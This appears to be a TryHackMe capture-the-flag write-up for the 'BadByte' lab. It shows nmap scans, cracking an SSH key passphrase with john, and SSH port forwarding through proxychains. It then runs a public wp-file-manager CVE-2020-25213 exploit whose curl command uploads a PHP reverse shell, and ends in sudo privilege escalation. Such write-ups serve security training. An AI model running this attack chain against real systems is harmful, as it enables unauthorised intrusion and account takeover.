# CTF TryHackMe - BadBytes

## Nmap

```bash
PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
30024/tcp open  ftp     syn-ack vsftpd 3.0.3
```

We can test to connect to the ftp as anonymous

## FTP

```bash
ftp 10.10.211.155 30024
Connected to 10.10.211.155.
220 (vsFTPd 3.0.3)
Name (10.10.211.155:grib): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 23 20:09 .
drwxr-xr-x    2 ftp      ftp          4096 Mar 23 20:09 ..
-rw-r--r--    1 ftp      ftp          1743 Mar 23 20:03 id_rsa
-rw-r--r--    1 ftp      ftp            78 Mar 23 20:09 note.txt
226 Directory send OK.
```

Download these files on our machine.

We got an private ssh key with a passphrase. Let's use ssh2john to crack this one.

## ssh2john & john

```bash
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash      
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
cupcake          (id_rsa)
```

We know the passphrase : **cupcake**

The content of note.txt :
```
I always forget my password. Just let me store an ssh key here.
- errorcauser
```

So at the moment we get a username, ssh key with her passphrase.

```
user : errorcause
passphrase : cupcake
```

## SSH access

Once we are connected to the server, we discover that only 3 bash commands are allowed : 

```
ls
cat
date
```

Let's see the note.txt file in /

```
cat note.txt
Hi Error!
I've set up a webserver locally so no one outside could access it.
It is for testing purposes only.  There are still a few things I need to do like setting up a custom theme.
You can check it out, you already know what to do.
-Cth
:)
```

So need to port forwarding using ssh and discover which localhost ports are open.

## Port Forward

**1. Setup Dynamic Port Forwarding using SSH**
```bash
ssh -i id_rsa -D 1337 errorcauser@10.10.169.111
```

**2. Setup proxychains for the Dynamic Port Forwarding**
```bash
vim sudo vim /etc/proxychains4.conf
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5 127.0.0.1 1337
```

**3. Run port scan to enum internal ports**
```bash
proxychains nmap -sT 127.0.0.1

[proxychains] config file found: /etc/proxychains4.conf                                                              
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4                                               
[proxychains] DLL init: proxychains-ng 4.14                                                                          
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 18:04 CEST                                                     
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:80  ...  OK                                          
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:53 <--socket error or timeout!                       
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:1720 <--socket error or timeout!                     
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:5900 <--socket error or timeout!                     
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:554 <--socket error or timeout!                      
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:80  ...  OK                                          
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:8888 <--socket error or timeout!                     
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:8080 <--socket error or timeout!                     
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:587 <--socket error or timeout!                      
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:3306  ...  OK                                        
[proxychains] Strict chain  ...  127.0.0.1:1337  ...  127.0.0.1:22  ...  OK 
```

So we discovered the ports 80 and 3306 are open.

Now lets grab more info about these ports

```bash
proxychains nmap -sC -sV -p 80 127.0.0.1
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.7
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BadByte &#8211; You&#039;re looking at me, but they are lookin...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

proxychains nmap -sC -sV -p 3306 127.0.0.1
PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.7.33-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.33-0ubuntu0.18.04.1
|   Thread ID: 34
|   Capabilities flags: 65535
|   Some Capabilities: LongColumnFlag, Support41Auth, LongPassword, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsCompression, FoundRows, SupportsTransactions, ODBCClient, DontAllowDatabaseTableColumn, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, Speaks41ProtocolNew, InteractiveClient, SwitchToSSLAfterHandshake, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: FB=Q}RmlM\x7F<R\x058k\x17EI\x13r
|_  Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.33_Auto_Generated_Server_Certificate
| Not valid before: 2021-03-23T18:47:06
|_Not valid after:  2031-03-21T18:47:06
|_ssl-date: TLS randomness does not represent time
```


We know the port of the webserver, we can perform a Local Port Forwarding to that port using SSH with the -L flag
```bash
ssh -i id_rsa -L 80:127.0.0.1:80 errorcauser@10.10.169.111
```

And go to our web browser to **127.0.0.1** to discover the web site.

Nmap indicate that is a wordpress web site, using WPScan to find vulnerabilites

## WPScan

Doing a simple scan :

```bash
wpscan --url http://127.0.0.1
```

But nothing interessting so i go further with users enumeration

```bash
wpscan --url http://127.0.0.1 -e u
[+] cth

 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

We got a username : **cth**

But before trying brute forcing the password, let's enumerate the plugins

```bash
wpscan --url http://127.0.0.1 -e p --plugins-detection aggressive
[i] Plugin(s) Identified:

[+] duplicator
 | Location: http://127.0.0.1/wp-content/plugins/duplicator/
 | Last Updated: 2021-05-26T20:43:00.000Z
 | Readme: http://127.0.0.1/wp-content/plugins/duplicator/readme.txt
 | [!] The version is out of date, the latest version is 1.4.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://127.0.0.1/wp-content/plugins/duplicator/, status: 403
 |
 | Version: 1.3.26 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://127.0.0.1/wp-content/plugins/duplicator/readme.txt

[+] wp-file-manager
 | Location: http://127.0.0.1/wp-content/plugins/wp-file-manager/
 | Last Updated: 2021-03-30T06:37:00.000Z
 | Readme: http://127.0.0.1/wp-content/plugins/wp-file-manager/readme.txt
 | [!] The version is out of date, the latest version is 7.1.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://127.0.0.1/wp-content/plugins/wp-file-manager/, status: 200
 |
 | Version: 6.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://127.0.0.1/wp-content/plugins/wp-file-manager/readme.txt
```
 
 Lets find some exploits for these plugins.

 ## Search for vulnerabilites about the plugins discovered

I have just googling : **wp-file-manager exploit**. I found this repo : https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213

WP-file-manager wordpress plugin (6.9) is vulnerable to unauthenticated arbitary file upload resulting in full compromise of the system. WPScan find our version : 6.0 so it's vulnerable.

Let's use it
```bash
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
```

We can test if our target is vulnerable
```bash
./wp-file-manager-exploit.sh --wp_url http://127.0.0.1 --check

============================================================================================
wp-file-manager wordpress plugin Unauthenticated RCE Exploit    By: Mansoor R (@time4ster)
============================================================================================

[+] Found wp-file-manager version: 6.0
[+] Version appears to be vulnerable 
[+] Target: http://127.0.0.1 is vulnerable
```

Yes, it is, now we do a php reverse shell and upload it.

```bash
./wp-file-manager-exploit.sh --wp_url http://127.0.0.1 -f /tmp/revshell.php --verbose                               

============================================================================================
wp-file-manager wordpress plugin Unauthenticated RCE Exploit    By: Mansoor R (@time4ster)
============================================================================================

curl POC :
curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw"  -F "mtime[]=1576045135" -F "upload[]=@//tmp/revshell.php" "http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" 

[+] W00t! W00t! File uploaded successfully.
Location:  /wp-content/plugins/wp-file-manager/lib/php/../files/revshell.php
```

Start a netcat listener, and go to 127.0.0.1/wp-content/plugins/wp-file-manager/lib/files/revshell.php
Yeah, we have a shell as **cth**

## Shell as cth user

```bash
$ id
uid=1000(cth) gid=1000(cth) groups=1000(cth),27(sudo)
```

After a long long time of linux enumeration i have found the file that contain a password of cth user.

```bash
find / -user cth -writable -type f 2>/dev/null
cat /var/log/bash.log
[..SNIP..]
G00dP@$sw0rd2020
[..SNIP..]
```

But, when i try to logged in...

```bash
ssh cth@10.10.202.135
G00dP@$sw0rd2020
```

It doesnt work... So trying to increment the year : **G00dP@$sw0rd2021**

It's works!!

## privEsc

```bash
sudo -l
Matching Defaults entries for cth on badbyte:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cth may run the following commands on badbyte:
    (ALL : ALL) ALL
```

We have all privileges, becoming root by this command
```bash
sudo su
```

And we'rrr root!!
